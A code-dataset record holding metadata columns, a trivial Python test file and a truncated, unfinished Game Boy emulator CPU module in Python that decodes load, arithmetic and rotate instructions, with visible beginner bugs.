| 0
| 0.046296
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b1182e58436bdaad4a7f50a0b4dd43aa6d82fb6
| 33
|
py
|
Python
|
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
import os
def func1():
pass
| 6.6
| 12
| 0.606061
| 5
| 33
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.30303
| 33
| 4
| 13
| 8.25
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
9bc68d017e17c2078882fc123291ef20dc9cce63
| 53,079
|
py
|
Python
|
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
class Registers:
"""Class to hold the registers of the CPU, and allow easy access to them individually and as pairs"""
def __init__(self):
#Easy references to the binary representations of the address
self.RegA = 0b111 # 111
self.RegB = 0b000 # 000
self.RegC = 0b001 # 001
self.RegD = 0b010 # 010
self.RegE = 0b011 # 011
self.RegH = 0b100 # 100
self.RegL = 0b101 # 101
self.a = 0 # 111
self.b = 0 # 000
self.c = 0 # 001
self.d = 0 # 010
self.e = 0 # 011
self.f = 0 #
self.h = 0 # 100
self.l = 0 # 101
self.pc = 0x0100
self.sp = 0xFFFE
self.cy = 0
def getReg(self, reg):
return {
0b111: self.a,
0b000: self.b,
0b001: self.c,
0b010: self.d,
0b110: self.e,
"f": self.f,
0b100: self.h,
0b101: self.l,
"pc": self.pc,
"sp": self.sp
}[reg]
def getPair(self, pair):
return {
"af": self.a << 8 | self.f,
"bc": self.b << 8 | self.c,
"de": self.d << 8 | self.e,
"hl": self.h << 8 | self.l,
"sp": self.sp
}[pair]
def setReg(self, reg, val):
if (reg == 0b111):
self.a = val
elif (reg == 0b000):
self.b = val
elif (reg == 0b001):
self.c = val
elif (reg == 0b010):
self.d = val
elif (reg == 0b011):
self.e = val
elif (reg == "f"):
self.f = val
elif (reg == 0b100):
self.h = val
elif (reg == 0b101):
self.l = val
elif (reg == "sp"):
self.sp = val
elif (reg == "pc"):
self.pc = val
def setPair(self, pair, val):
if (pair == "af"):
self.f = val & 0b11111111
self.a = val >> 8
elif (pair == "bc"):
self.c = val & 0b11111111
self.b = val >> 8
elif (pair == "de"):
self.e = val & 0b11111111
self.d = val >> 8
elif (pair == "hl"):
self.l = val & 0b11111111
self.h = val >> 8
def setFlag(self, flag, val):
if(flag == "z"):
mask = 0b01111111
tmp = self.f & mask
self.f = tmp | (val << 7)
elif(flag == "n"):
mask = 0b10111111
tmp = self.f & mask
self.f = tmp | (val << 6)
elif(flag == "h"):
mask = 0b11011111
tmp = self.f & mask
self.f = tmp | (val << 5)
elif(flag == "cy"):
mask = 0b11101111
tmp = self.f & mask
self.f = tmp | (val << 4)
def getFlag(self, flag):
if(flag == "z"):
mask = 0b10000000
tmp = self.f & mask
return tmp >> 7
elif(flag == "n"):
mask = 0b01000000
tmp = self.f & mask
return tmp >> 6
elif(flag == "h"):
mask = 0b00100000
tmp = self.f & mask
return tmp >> 5
elif(flag == "cy"):
mask = 0b00010000
tmp = self.f & mask
return tmp >> 4
class CPU():
"""Class contains the overall CPU Structure, including decoding the instructions"""
def __init__(self):
self.reg = Registers()
self.opcode = 0
self.r = 0
self.rp = 0
self.n = 0
self.inst = 0
self.mem = Memory()
self.bcd = 0
self.bcdcy = 0
def fetch(self):
self.inst = self.mem.read(self.reg.pc)
self.reg.pc = self.reg.pc + 1
def setInst(self, byte):
self.inst = byte
def decode(self):
self.opcode = (self.inst & 0xc0) >> 6 #get bits 7 and 6 to find opcode
self.r = (self.inst & 0x38) >> 3 #get bits 5, 4, and 3
self.rp = (self.inst & 0x07) #get first 3 bits
self.n = self.inst #get n in the event it is needed.
def execute(self):
#8-bit load instructions
if(self.opcode == 1 and self.r != 0b110 and self.rp != 0b110): #load instruction r <- rp
tmp = self.reg.getReg(self.rp)
self.reg.setReg(self.r, tmp)
elif(self.opcode == 1 and self.rp == 0b110): # r <- mem[HL]
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.r, tmp)
elif(self.opcode == 1 and self.r == 0b110): #mem[HL] <- rp
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.rp)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.rp == 0b110 and self.r != 0b110): #r <- n
tmpreg = self.r
self.fetch() #pull next byte, updates PC along with it.
self.decode()
self.reg.setReg(tmpreg, self.n)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b110): #mem[HL] <- n
tmpreg = self.reg.getPair("hl")
self.fetch()
self.decode()
self.mem.write(tmpreg, self.n)
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b010): #A <- mem[BC]
memaddr = self.reg.getPair("bc")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 0 and self.r == 0b011 and selg.rp == 0b010): #A <- mem[DE]
memaddr = self.reg.getPair("de")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b010): #A <- mem[0xFF00 + C]
memaddr = self.reg.getReg(self.reg.RegC) + 0xFF00
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b010): #mem[0xFF00 + C] <- A
memaddr = self.reg.getReg(self.reg.RegC) + 0xFF00
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b000): #A <- mem[n]
self.fetch()
self.decode()
tmp = self.mem.read(self.n)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b000): #mem[n] <- A
self.fetch()
self.decode()
tmp = self.reg.getReg(self.reg.RegA)
memaddr = 0xFF00 + self.n #this only writes into mem >= 0xFF00
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b010): #A <- mem[nn]
self.fetch()
self.decode()
memaddr = self.n << 8
self.fetch()
self.decode()
memaddr = memaddr + self.n
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b010): #mem[nn] <- A
self.fetch()
self.decode()
memaddr = self.n << 8
self.fetch()
self.decode()
memaddr = memaddr + self.n
tmp = self.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b101 and self.rp == 0b010): #A <- mem[HL], HL = HL + 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
memaddr = memaddr + 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b111 and self.rp == 0b010): #A <- mem[HL], HL = HL - 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
memaddr = memaddr - 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b010): #mem[BC] <- A
memaddr = self.reg.getPair("bc")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b010): #mem[DE] <- A
memaddr = self.reg.getPair("de")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b100 and self.rp == 0b010): #mem[HL] <- A, HL = HL + 1
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
memaddr = memaddr + 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b010): #mem[HL] <- A, HL = HL - 1
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
memaddr = memaddr - 1
self.reg.setPair("hl", memaddr)
#16 bit load instructions
elif(self.opcode == 0 and self.rp == 0b001 and self.r%2 == 0): #dd <- nn
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "sp"
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.reg.setPair(pair, tmp)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b001): #SP <- HL
tmp = self.reg.getPair("hl")
self.reg.setPair("sp", tmp)
elif(self.opcode == 3 and self.rp == 0b101 and self.r%2 == 0): #mem[SP-1] <- ddH, mem[SP-2] <- ddL
memaddr = self.reg.getReg("sp")
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "af"
tmp = self.reg.getPair(pair)
low = tmp & 0b11111111
high = tmp >> 8
self.mem.write(memaddr - 1, high)
self.mem.write(memaddr - 2, low)
self.reg.setReg("sp", memaddr - 2)
elif(self.opcode == 3 and self.rp == 0b001 and self.r%2 == 0): #qqL <- mem[SP], qqH <- mem[SP+1], SP <- SP + 2
memaddr = self.reg.getReg("sp")
if(self.r == 0b000):
hreg == self.reg.RegB
lreg == self.reg.RegC
elif(self.r == 0b010):
hreg == self.reg.RegD
lreg == self.reg.RegE
elif(self.r == 0b100):
hreg == self.reg.RegH
lreg == self.reg.RegL
elif(self.r == 0b110):
hreg == self.reg.RegA
lreg == "f"
tmpL = self.mem.read(memaddr)
tmpH = self.mem.read(memaddr + 1)
self.reg.setReg(lreg, tmpL)
self.reg.setReg(hreg, tmpH)
self.reg.setReg("sp", memaddr - 2)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b000): #HL <- SP + e
self.fetch()
self.decode()
tmp = self.reg.getReg("sp")
res = tmp + self.n
self.reg.setPair("hl", res)
self.reg.setFlag('z', 0)
self.reg.setFlag('n', 0)
if((tmp >> 11) & 0b01 == (res >> 11) & 0b01):
self.reg.setFlag('h', 0) #carry from 11th bit...
else:
self.reg.setFlag('h', 1)
self.reg.setFlag('cy', (tmp & (1 << 16)) >> 16) #check for carry bit at end
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b000): #mem[nn] <- SPl, mem[nn+1] <-SPh
self.fetch()
self.decode()
memaddr = self.n
self.fetch()
self.decode()
memaddr = memaddr | (self.n << 8)
tmp = self.getReg("sp")
tmpL = tmp & 0b11111111
tmpH = tmp >> 8
self.mem.write(memaddr, tmpL)
self.mem.write(memaddr + 1, tmpH)
#8 bit arithmatic operations
elif(self.opcode == 2 and self.r == 0b000 and self.rp != 0b110): #A <- A + rp
regA = self.reg.getReg(self.regA)
tmp = self.reg.getReg(self.rp)
res = tmp + regA
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4) #exclusive or the fourth bit s including result to find if their was a carry
self.reg.setFlag('cy', res >> 8)
elif(self.opcode == 3 and self.r == 0b000 and self.rp == 0b110): #A <- A + n
self.fetch()
self.decode()
tmpA = self.getReg(self.RegA)
tmp = self.n
res = tmpA + tmp
self.reg.setReg(self.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b000 and self.r == 0b110): #A <- A + mem[HL]
memaddr = self.reg.getPair("hl")
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.mem.read(memaddr)
res = tmp + tmpA
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b001 and self.rp != 0b110): #A <- A + rp + CY
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
CY = self.reg.getFlag('cy')
res = tmpA + tmp + CY
self.reg.setReg(self.reg.RegA, tmpA + tmp + CY)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (tmpA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b110): #A <- A + n + CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.getFlag('cy')
self.fetch()
self.decode()
res = tmpA + self.n + CY
self.reg.setReg(self.reg.RegA, tmp)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b001 and self.rp == 0b110): #A <- A + mem[HL] + CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.cy #TODO: Implement this...
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA + tmp + CY
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b010 and self.rp != 0b110): #A <- A - rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (self.reg.RegA & 0b100) >> 2
self.reg.setFlag('h', 1 if A4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 3 and self.r == 0b010 and self.rp == 0b110): #A <- A - n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b010 and self.rp == 0b110): #A <- A - mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b011 and self.rp != 0b110): #A <- A - rp - CY
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
CY = self.reg.cy
self.reg.setReg(self.reg.RegA, tmpA - tmp - CY)
elif(self.opcode == 3 and self.r == 0b011 and self.rp == 0b110): #A <- A - n - CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.getFlag('cy')
self.fetch()
self.decode()
res = tmpA - self.n - CY
self.self.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b011 and self.rp == 0b110): #A <- A - mem[HL] - CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.cy
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA - tmp - CY
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b100 and self.rp != 0b110): #A <- A & rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b110): #A <- A & n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 2 and self.r == 0b100 and self.rp == 0b110): #A <- A & mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 2 and self.r == 0b110 and self.rp != 0b110): #A <- A | rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b110): #A <- A | n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b110 and self.rp == 0b110): #A <- A | mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b101 and self.rp != 0b110): #A <- A xor rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA ^ tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b110): #A <- A xor n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
res = tmpA ^ self.n
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b101 and self.rp == 0b110): #A <- A xor mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA ^ tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b111 and self.rp != 0b110): #A == rp
#"Compares the contents and sets flag if they are equal" <- not exactly a helpful description...
tmpA = self.reg.getReg(self.reg.RegA)
tmp == self.reg.getReg(self.rp)
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b110): #A == n
tmpA == self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 2 and self.r == 0b111 and self.rp == 0b110): #A == mem[HL]
tmpA == self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 0 and self.r != 0b110 and self.rp == 0b100): #r <- r + 1
tmp == self.reg.getReg(self.r)
res = tmp + 1
self.reg.setReg(self.r, res)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b100): #mem[HL] <- mem[HL] + 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmp + 1
self.mem.write(memaddr, res)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r != 0b110 and self.rp == 0b101): #r <- r - 1
tmp = self.reg.getReg(self.r)
res = tmp - 1
self.reg.setReg(self.r, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b101): #mem[HL] <- mem[HL] - 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.mem.write(memaddr, tmp - 1)
self.reg.setFlag('z', 1 if tmp == 1 else 0)
self.reg.setFlag('n', 1)
tmpbottom = tmp & 0b111
self.reg.setFlag('h', 1 if tmpbottom == 0 else 0)
#16 bit arithmatic operations
elif(self.opcode == 0 and self.r % 2 == 1 and self.rp == 0b001): #HL <- HL + ss
tmpHL = self.reg.getPair("hl")
if(self.r == 0b001):
tmp = self.reg.getPair("bc")
elif(self.r == 0b011):
tmp = self.reg.getPair("de")
elif(self.r == 0b101):
tmp = self.reg.getPair("hl")
elif(self.r == 0b111):
tmp = self.reg.getPair("sp")
res = tmpHL + tmp
self.reg.setPair("hl", res)
self.reg.setFlag('n', 0)
tmp11 = (tmp >> 10) & 0b1
res11 = (res >> 10) & 0b1
tmpHL11 (tmpHL >> 10) & 0b1
self.reg.setFlag('h', tmp11 ^ res11 ^ tmpHL11)
self.reg.setFlag('cy', res >> 15)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b000): #SP <- SP + n
tmpSL = self.reg.getReg("sp")
self.fetch()
self.decode()
tmp = self.n
res = tmpSL + tmp
self.reg.setPair("sp", res)
self.reg.setFlag('z', 0)
self.reg.setFlag('n', 0)
tmp11 = (tmp >> 10) & 0b1
res11 = (res >> 10) & 0b1
tmpSL11 = (tmpSL >> 10) & 0b1
self.reg.setFlag('h', tmp11 ^ res11 ^ tmpSL11)
self.reg.setFlag('cy', res >> 15)
elif(self.opcode == 0 and self.r%2 == 0 and self.rp == 0b011): #ss <- ss + 1
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "sp"
tmp = self.reg.getPair(pair)
self.reg.setPair(pair, tmp + 1) #No flags get changed
elif(self.opcode == 0 and self.r%2 == 1 and self.rp == 0b011): #ss <- ss - 1
if(self.r == 0b001):
pair = "bc"
elif(self.r == 0b011):
pair = "de"
elif(self.r == 0b101):
pair = "hl"
elif(self.r == 0b111):
pair = "sp"
tmp = self.reg.getPair(pair)
self.reg.setPair(pair, tmp - 1)
#Rotate and Shift
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b111): # A << 1 + A[0], CY = A[7]
tmpA = self.reg.getReg(self.reg.RegA)
bit = (tmpA & 0b10000000) >> 7
tmpA = (tmpA << 1) + bit
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b111): #A << 1 + A[7]
tmpA = self.reg.getReg(self.reg.RegA)
bit = (tmpA & 0b10000000) >> 7
tmpA = (tmpA << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b111): #A >> 1 + (A[0] << 7)
tmpA = self.reg.getReg(self.reg.RegA)
bit = tmpA & 0b01
tmpA = (tmpA >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b011 and self.rp == 0b111): #A >> 1 + (A[0] << 7)
tmpA = self.reg.getReg(self.reg.RegA)
bit = tmpA & 0b01
tmpA = (tmpA >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b011): #rshifts of r or (HL)
self.fetch()
self.decode()
if(self.r == 0b000):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | bit
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | bit
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b010):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
